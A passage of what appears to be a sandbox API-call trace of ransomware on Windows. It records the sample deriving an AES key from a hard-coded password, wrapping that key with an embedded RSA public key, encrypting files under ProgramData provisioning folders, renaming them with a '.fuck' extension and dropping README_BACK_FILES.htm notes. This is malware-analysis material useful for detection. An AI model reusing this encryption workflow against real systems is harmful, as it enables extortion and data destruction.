(lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.646] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.647] CryptDestroyHash (hHash=0x2845fe0) returned 1 [0237.647] CryptDestroyKey (hKey=0x2846160) returned 1 [0237.647] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.647] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.647] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0237.647] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.647] AreFileApisANSI () returned 1 [0237.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2844b28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.647] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.648] GetLastError () returned 0x5 [0237.648] GetLastError () returned 0x5 [0237.648] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.648] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.648] GetLastError () returned 0x5 [0237.648] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml")) returned 0x20 [0237.648] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.648] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.649] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.649] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.649] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2844b28) returned 1 [0237.652] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.652] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.652] CryptHashData (hHash=0x2845fe0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.652] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2845fe0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2845de0) returned 1 [0237.652] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.652] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.652] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2845320) returned 1 [0237.653] CryptImportPublicKeyInfo (in: hCryptProv=0x2845320, dwCertEncodingType=0x1, pInfo=0x284f4c8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f4f8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f500*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2846160) returned 1 [0237.653] CryptEncrypt (in: hKey=0x2846160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.653] CryptEncrypt (in: hKey=0x2846160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845100*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2845100*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.653] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845100, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.653] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x2857d70, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.653] CryptEncrypt (in: hKey=0x2845de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857d70*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x2857d70*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.653] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.653] CloseHandle (hObject=0xffffffff) returned 1 [0237.653] CloseHandle (hObject=0xffffffff) returned 1 [0237.653] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.654] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.654] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg")) returned 0 [0237.654] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.fuck")) returned 0 [0237.655] CryptDestroyHash (hHash=0x2845fe0) returned 1 [0237.655] CryptDestroyKey (hKey=0x2845de0) returned 1 [0237.655] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.655] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.655] FindClose (in: hFindFile=0x2846460 | out: hFindFile=0x2846460) returned 1 [0237.655] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.655] AreFileApisANSI () returned 1 [0237.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.655] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.656] GetLastError () returned 0x5 [0237.656] GetLastError () returned 0x5 [0237.656] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.656] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.656] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\readme_back_files.htm")) returned 0xffffffff [0237.656] AreFileApisANSI () returned 1 [0237.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2df0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.656] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.657] GetLastError () returned 0x5 [0237.657] GetLastError () returned 0x5 [0237.657] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.657] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845de0 [0237.657] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.657] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.657] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.657] GetLastError () returned 0x5 [0237.657] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml")) returned 0x20 [0237.658] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.658] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.658] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.659] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.659] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.661] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.661] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.661] CryptHashData (hHash=0x2846460, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.661] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2846460, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2845ea0) returned 1 [0237.661] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.661] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.661] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845430) returned 1 [0237.662] CryptImportPublicKeyInfo (in: hCryptProv=0x2845430, dwCertEncodingType=0x1, pInfo=0x284f598*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f5c8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f5d0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2845fe0) returned 1 [0237.662] CryptEncrypt (in: hKey=0x2845fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.662] CryptEncrypt (in: hKey=0x2845fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845188*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2845188*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.663] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845188, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.663] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x285bd78, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.663] CryptEncrypt (in: hKey=0x2845ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.663] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.663] CloseHandle (hObject=0xffffffff) returned 1 [0237.663] CloseHandle (hObject=0xffffffff) returned 1 [0237.663] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.663] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.664] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg")) returned 0 [0237.664] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.fuck")) returned 0 [0237.664] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.664] CryptDestroyKey (hKey=0x2845ea0) returned 1 [0237.664] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.664] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.664] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.666] GetLastError () returned 0x5 [0237.667] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml")) returned 0x20 [0237.667] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.668] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.668] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.668] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.668] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.671] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.671] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.671] CryptHashData (hHash=0x28463e0, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.671] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.671] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.671] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.671] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845298) returned 1 [0237.672] CryptImportPublicKeyInfo (in: hCryptProv=0x2845298, dwCertEncodingType=0x1, pInfo=0x2850508*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2850538*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2850540*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846ca0) returned 1 [0237.672] CryptEncrypt (in: hKey=0x2846ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.672] CryptEncrypt (in: hKey=0x2846ca0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2833a50*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2833a50*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.672] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2833a50, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.672] ReadFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x285bd78, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.672] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x285bd78*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.672] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285bd78, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.672] CloseHandle (hObject=0xffffffff) returned 1 [0237.673] CloseHandle (hObject=0xffffffff) returned 1 [0237.673] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: 